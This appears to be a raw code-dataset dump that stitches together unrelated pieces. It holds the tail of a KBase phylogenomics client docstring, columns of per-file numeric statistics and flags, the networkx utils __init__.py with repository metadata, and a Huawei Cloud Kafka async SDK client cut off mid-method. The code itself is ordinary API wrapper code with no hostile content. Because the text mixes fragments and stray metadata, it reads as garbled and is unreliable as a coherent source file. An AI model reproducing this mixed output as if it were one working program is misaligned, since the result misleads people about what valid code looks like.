list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "get_configure_categories_Output" -> structure: parameter "cats" of list of String, parameter "cat2name" of type "Cat2Name" (category to name) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "cat" of type "category" (Categories), parameter "cat2group" of type "Cat2Group" (category to group) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "cat" of type "category" (Categories), parameter "domfam2cat" of type "DomFam2Cat" (domain family to category) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "domfam" of type "domainfamily" (Domains), parameter "cat2domfams" of type "Cat2DomFams" (category to domain family) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "cat" of type "category" (Categories) """ return self._client.call_method('kb_phylogenomics.get_configure_categories', [params], self._service_ver, context) def status(self, context=None): return self._client.call_method('kb_phylogenomics.status', [], self._service_ver, context)
59.258197
93
0.658794
3,400
28,918
5.302059
0.086471
0.049592
0.066955
0.028735
0.856604
0.840628
0.81683
0.787929
0.774949
0.748045
0
0.000934
0.259631
28,918
487
94
59.379877
0.841056
0.704509
0
0.240506
1
0.012658
0.156726
0.141677
0
0
0
0
0
1
0.265823
false
0.025316
0.050633
0.012658
0.582278
0.012658
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
9
48f02c18873c94098ec234cdc39ca3c8cf0a5833
227
py
Python
networkx/utils/__init__.py
tempcyc/networkx
cae83ba501c242567cb2454f97f851898276f06e
[ "BSD-3-Clause" ]
1
2015-07-16T01:36:44.000Z
2015-07-16T01:36:44.000Z
networkx/utils/__init__.py
tempcyc/networkx
cae83ba501c242567cb2454f97f851898276f06e
[ "BSD-3-Clause" ]
null
null
null
networkx/utils/__init__.py
tempcyc/networkx
cae83ba501c242567cb2454f97f851898276f06e
[ "BSD-3-Clause" ]
null
null
null
from networkx.utils.misc import * from networkx.utils.decorators import * from networkx.utils.random_sequence import * from networkx.utils.union_find import * from networkx.utils.rcm import * from networkx.utils.heaps import *
32.428571
44
0.814978
32
227
5.71875
0.375
0.393443
0.557377
0.628415
0
0
0
0
0
0
0
0
0.105727
227
6
45
37.833333
0.901478
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
48fcc42563a62ca0cd351541f69ea744d9c75e29
109,256
py
Python
huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/kafka_async_client.py
wuchen-huawei/huaweicloud-sdk-python-v3
3683d703f4320edb2b8516f36f16d485cff08fc2
[ "Apache-2.0" ]
1
2021-11-03T07:54:50.000Z
2021-11-03T07:54:50.000Z
huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/kafka_async_client.py
wuchen-huawei/huaweicloud-sdk-python-v3
3683d703f4320edb2b8516f36f16d485cff08fc2
[ "Apache-2.0" ]
null
null
null
huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/kafka_async_client.py
wuchen-huawei/huaweicloud-sdk-python-v3
3683d703f4320edb2b8516f36f16d485cff08fc2
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 from __future__ import absolute_import import datetime import re import importlib import six from huaweicloudsdkcore.client import Client, ClientBuilder from huaweicloudsdkcore.exceptions import exceptions from huaweicloudsdkcore.utils import http_utils from huaweicloudsdkcore.sdk_stream_request import SdkStreamRequest class KafkaAsyncClient(Client): """ :param configuration: .Configuration object for this client :param pool_threads: The number of threads to use for async requests to the API. More threads means more concurrent API requests. """ PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types NATIVE_TYPES_MAPPING = { 'int': int, 'long': int if six.PY3 else long, 'float': float, 'str': str, 'bool': bool, 'date': datetime.date, 'datetime': datetime.datetime, 'object': object, } def __init__(self): super(KafkaAsyncClient, self).__init__() self.model_package = importlib.import_module("huaweicloudsdkkafka.v2.model") self.preset_headers = {'User-Agent': 'HuaweiCloud-SDK-Python'} @classmethod def new_builder(cls, clazz=None): if clazz is None: return ClientBuilder(cls) if clazz.__name__ != "KafkaClient": raise TypeError("client type error, support client type is KafkaClient") return ClientBuilder(clazz) def batch_create_or_delete_kafka_tag_async(self, request): """批量添加或删除实例标签 批量添加或删除实例标签。 :param BatchCreateOrDeleteKafkaTagRequest request :return: BatchCreateOrDeleteKafkaTagResponse """ return self.batch_create_or_delete_kafka_tag_with_http_info(request) def batch_create_or_delete_kafka_tag_with_http_info(self, request): """批量添加或删除实例标签 批量添加或删除实例标签。 :param BatchCreateOrDeleteKafkaTagRequest request :return: BatchCreateOrDeleteKafkaTagResponse """ all_params = ['instance_id', 'batch_create_or_delete_kafka_tag_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: 
path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/kafka/{instance_id}/tags/action', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchCreateOrDeleteKafkaTagResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def batch_delete_instance_topic_async(self, request): """Kafka实例批量删除Topic 该接口用于向Kafka实例批量删除Topic。 :param BatchDeleteInstanceTopicRequest request :return: BatchDeleteInstanceTopicResponse """ return self.batch_delete_instance_topic_with_http_info(request) def batch_delete_instance_topic_with_http_info(self, request): """Kafka实例批量删除Topic 该接口用于向Kafka实例批量删除Topic。 :param BatchDeleteInstanceTopicRequest request :return: BatchDeleteInstanceTopicResponse """ all_params = ['instance_id', 'batch_delete_instance_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) 
auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics/delete', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchDeleteInstanceTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def batch_delete_instance_users_async(self, request): """批量删除用户 批量删除Kafka实例的用户 :param BatchDeleteInstanceUsersRequest request :return: BatchDeleteInstanceUsersResponse """ return self.batch_delete_instance_users_with_http_info(request) def batch_delete_instance_users_with_http_info(self, request): """批量删除用户 批量删除Kafka实例的用户 :param BatchDeleteInstanceUsersRequest request :return: BatchDeleteInstanceUsersResponse """ all_params = ['instance_id', 'batch_delete_instance_users_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchDeleteInstanceUsersResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, 
request_type=request.__class__.__name__) def batch_restart_or_delete_instances_async(self, request): """批量重启或删除实例 批量重启或删除实例。 在实例重启过程中,客户端的生产与消费消息等请求会被拒绝。 实例删除后,实例中原有的数据将被删除,且没有备份,请谨慎操作。 :param BatchRestartOrDeleteInstancesRequest request :return: BatchRestartOrDeleteInstancesResponse """ return self.batch_restart_or_delete_instances_with_http_info(request) def batch_restart_or_delete_instances_with_http_info(self, request): """批量重启或删除实例 批量重启或删除实例。 在实例重启过程中,客户端的生产与消费消息等请求会被拒绝。 实例删除后,实例中原有的数据将被删除,且没有备份,请谨慎操作。 :param BatchRestartOrDeleteInstancesRequest request :return: BatchRestartOrDeleteInstancesResponse """ all_params = ['batch_restart_or_delete_instances_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/action', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchRestartOrDeleteInstancesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_connector_async(self, request): """创建实例的转储节点 创建实例的转储节点。 :param CreateConnectorRequest request :return: CreateConnectorResponse """ return self.create_connector_with_http_info(request) def create_connector_with_http_info(self, request): """创建实例的转储节点 创建实例的转储节点。 :param CreateConnectorRequest request :return: CreateConnectorResponse """ all_params = 
['instance_id', 'create_connector_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/connector', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateConnectorResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_instance_topic_async(self, request): """Kafka实例创建Topic 该接口用于向Kafka实例创建Topic。 :param CreateInstanceTopicRequest request :return: CreateInstanceTopicResponse """ return self.create_instance_topic_with_http_info(request) def create_instance_topic_with_http_info(self, request): """Kafka实例创建Topic 该接口用于向Kafka实例创建Topic。 :param CreateInstanceTopicRequest request :return: CreateInstanceTopicResponse """ all_params = ['instance_id', 'create_instance_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] 
if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateInstanceTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_instance_user_async(self, request): """创建用户 创建Kafka实例的用户,用户可连接开启SASL的Kafka实例。 :param CreateInstanceUserRequest request :return: CreateInstanceUserResponse """ return self.create_instance_user_with_http_info(request) def create_instance_user_with_http_info(self, request): """创建用户 创建Kafka实例的用户,用户可连接开启SASL的Kafka实例。 :param CreateInstanceUserRequest request :return: CreateInstanceUserResponse """ all_params = ['instance_id', 'create_instance_user_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, 
response_type='CreateInstanceUserResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_partition_async(self, request): """新增Kafka实例指定Topic分区 新增Kafka实例指定Topic分区。 :param CreatePartitionRequest request :return: CreatePartitionResponse """ return self.create_partition_with_http_info(request) def create_partition_with_http_info(self, request): """新增Kafka实例指定Topic分区 新增Kafka实例指定Topic分区。 :param CreatePartitionRequest request :return: CreatePartitionResponse """ all_params = ['instance_id', 'topic', 'create_partition_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions-reassignment', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreatePartitionResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_post_paid_instance_async(self, request): """创建实例(按需) 创建实例,该接口创建的实例为按需计费的方式。 :param CreatePostPaidInstanceRequest request :return: CreatePostPaidInstanceResponse """ 
return self.create_post_paid_instance_with_http_info(request) def create_post_paid_instance_with_http_info(self, request): """创建实例(按需) 创建实例,该接口创建的实例为按需计费的方式。 :param CreatePostPaidInstanceRequest request :return: CreatePostPaidInstanceResponse """ all_params = ['create_post_paid_instance_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreatePostPaidInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_sink_task_async(self, request): """创建转储任务 创建转储任务。 :param CreateSinkTaskRequest request :return: CreateSinkTaskResponse """ return self.create_sink_task_with_http_info(request) def create_sink_task_with_http_info(self, request): """创建转储任务 创建转储任务。 :param CreateSinkTaskRequest request :return: CreateSinkTaskResponse """ all_params = ['connector_id', 'create_sink_task_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' 
in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateSinkTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def delete_background_task_async(self, request): """删除后台任务管理中的指定记录 删除后台任务管理中的指定记录。 :param DeleteBackgroundTaskRequest request :return: DeleteBackgroundTaskResponse """ return self.delete_background_task_with_http_info(request) def delete_background_task_with_http_info(self, request): """删除后台任务管理中的指定记录 删除后台任务管理中的指定记录。 :param DeleteBackgroundTaskRequest request :return: DeleteBackgroundTaskResponse """ all_params = ['instance_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/tasks/{task_id}', method='DELETE', path_params=path_params, query_params=query_params, 
header_params=header_params, body=body_params, post_params=form_params, response_type='DeleteBackgroundTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def delete_instance_async(self, request): """删除指定的实例 删除指定的实例,释放该实例的所有资源。 :param DeleteInstanceRequest request :return: DeleteInstanceResponse """ return self.delete_instance_with_http_info(request) def delete_instance_with_http_info(self, request): """删除指定的实例 删除指定的实例,释放该实例的所有资源。 :param DeleteInstanceRequest request :return: DeleteInstanceResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}', method='DELETE', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='DeleteInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def delete_sink_task_async(self, request): """删除单个转储任务 删除单个转储任务。 :param DeleteSinkTaskRequest request :return: DeleteSinkTaskResponse """ return self.delete_sink_task_with_http_info(request) def delete_sink_task_with_http_info(self, request): """删除单个转储任务 删除单个转储任务。 :param DeleteSinkTaskRequest request :return: DeleteSinkTaskResponse """ all_params = ['connector_id', 
'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks/{task_id}', method='DELETE', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='DeleteSinkTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_available_zones_async(self, request): """查询可用区信息 在创建实例时,需要配置实例所在的可用区ID,可通过该接口查询可用区的ID。 :param ListAvailableZonesRequest request :return: ListAvailableZonesResponse """ return self.list_available_zones_with_http_info(request) def list_available_zones_with_http_info(self, request): """查询可用区信息 在创建实例时,需要配置实例所在的可用区ID,可通过该接口查询可用区的ID。 :param ListAvailableZonesRequest request :return: ListAvailableZonesResponse """ all_params = [] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = 
['apig-auth-iam'] return self.call_api( resource_path='/v2/available-zones', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListAvailableZonesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_background_tasks_async(self, request): """查询实例的后台任务列表 查询实例的后台任务列表。 :param ListBackgroundTasksRequest request :return: ListBackgroundTasksResponse """ return self.list_background_tasks_with_http_info(request) def list_background_tasks_with_http_info(self, request): """查询实例的后台任务列表 查询实例的后台任务列表。 :param ListBackgroundTasksRequest request :return: ListBackgroundTasksResponse """ all_params = ['instance_id', 'start', 'limit', 'begin_time', 'end_time'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'start' in local_var_params: query_params.append(('start', local_var_params['start'])) if 'limit' in local_var_params: query_params.append(('limit', local_var_params['limit'])) if 'begin_time' in local_var_params: query_params.append(('begin_time', local_var_params['begin_time'])) if 'end_time' in local_var_params: query_params.append(('end_time', local_var_params['end_time'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/tasks', method='GET', path_params=path_params, query_params=query_params, 
header_params=header_params, body=body_params, post_params=form_params, response_type='ListBackgroundTasksResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_instance_topics_async(self, request): """Kafka实例查询Topic 该接口用于查询指定Kafka实例的Topic详情。 :param ListInstanceTopicsRequest request :return: ListInstanceTopicsResponse """ return self.list_instance_topics_with_http_info(request) def list_instance_topics_with_http_info(self, request): """Kafka实例查询Topic 该接口用于查询指定Kafka实例的Topic详情。 :param ListInstanceTopicsRequest request :return: ListInstanceTopicsResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListInstanceTopicsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_instances_async(self, request): """查询所有实例列表 查询租户的实例列表,支持按照条件查询。 :param ListInstancesRequest request :return: ListInstancesResponse """ return self.list_instances_with_http_info(request) def list_instances_with_http_info(self, request): """查询所有实例列表 查询租户的实例列表,支持按照条件查询。 :param ListInstancesRequest 
request :return: ListInstancesResponse """ all_params = ['engine', 'name', 'instance_id', 'status', 'include_failure', 'exact_match_name', 'enterprise_project_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] if 'engine' in local_var_params: query_params.append(('engine', local_var_params['engine'])) if 'name' in local_var_params: query_params.append(('name', local_var_params['name'])) if 'instance_id' in local_var_params: query_params.append(('instance_id', local_var_params['instance_id'])) if 'status' in local_var_params: query_params.append(('status', local_var_params['status'])) if 'include_failure' in local_var_params: query_params.append(('include_failure', local_var_params['include_failure'])) if 'exact_match_name' in local_var_params: query_params.append(('exact_match_name', local_var_params['exact_match_name'])) if 'enterprise_project_id' in local_var_params: query_params.append(('enterprise_project_id', local_var_params['enterprise_project_id'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListInstancesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_products_async(self, request): """查询产品规格列表 在创建kafka实例时,需要配置订购的产品ID(即product_id),可通过该接口查询产品规格。 
例如,要订购按需计费、基准带宽为100MB的kafka实例,可从接口响应消息中,查找Hourly的消息体,然后找到bandwidth为100MB的记录对应的product_id,该product_id的值即是创建上述kafka实例时需要配置的产品ID。 同时,unavailable_zones字段表示资源不足的可用区列表,如果为空,则表示所有可用区都有资源,如果不为空,则表示字段值的可用区没有资源。所以必须确保您购买的资源所在的可用区有资源,不在该字段列表内。 例如,响应消息中bandwidth字段为1200MB的记录,unavailable_zones字段包含cn-east-2b、cn-east-2a和cn-east-2d,表示在华东-上海2的可用区1、可用区2、可用区3都没有该资源。 :param ListProductsRequest request :return: ListProductsResponse """ return self.list_products_with_http_info(request) def list_products_with_http_info(self, request): """查询产品规格列表 在创建kafka实例时,需要配置订购的产品ID(即product_id),可通过该接口查询产品规格。 例如,要订购按需计费、基准带宽为100MB的kafka实例,可从接口响应消息中,查找Hourly的消息体,然后找到bandwidth为100MB的记录对应的product_id,该product_id的值即是创建上述kafka实例时需要配置的产品ID。 同时,unavailable_zones字段表示资源不足的可用区列表,如果为空,则表示所有可用区都有资源,如果不为空,则表示字段值的可用区没有资源。所以必须确保您购买的资源所在的可用区有资源,不在该字段列表内。 例如,响应消息中bandwidth字段为1200MB的记录,unavailable_zones字段包含cn-east-2b、cn-east-2a和cn-east-2d,表示在华东-上海2的可用区1、可用区2、可用区3都没有该资源。 :param ListProductsRequest request :return: ListProductsResponse """ all_params = ['engine'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] if 'engine' in local_var_params: query_params.append(('engine', local_var_params['engine'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/products', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListProductsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_sink_tasks_async(self, 
request): """查询转储任务列表 查询转储任务列表。 :param ListSinkTasksRequest request :return: ListSinkTasksResponse """ return self.list_sink_tasks_with_http_info(request) def list_sink_tasks_with_http_info(self, request): """查询转储任务列表 查询转储任务列表。 :param ListSinkTasksRequest request :return: ListSinkTasksResponse """ all_params = ['connector_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListSinkTasksResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_manager_password_async(self, request): """重置Manager密码 重置Manager密码。 :param ResetManagerPasswordRequest request :return: ResetManagerPasswordResponse """ return self.reset_manager_password_with_http_info(request) def reset_manager_password_with_http_info(self, request): """重置Manager密码 重置Manager密码。 :param ResetManagerPasswordRequest request :return: ResetManagerPasswordResponse """ all_params = ['instance_id', 'reset_manager_password_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: 
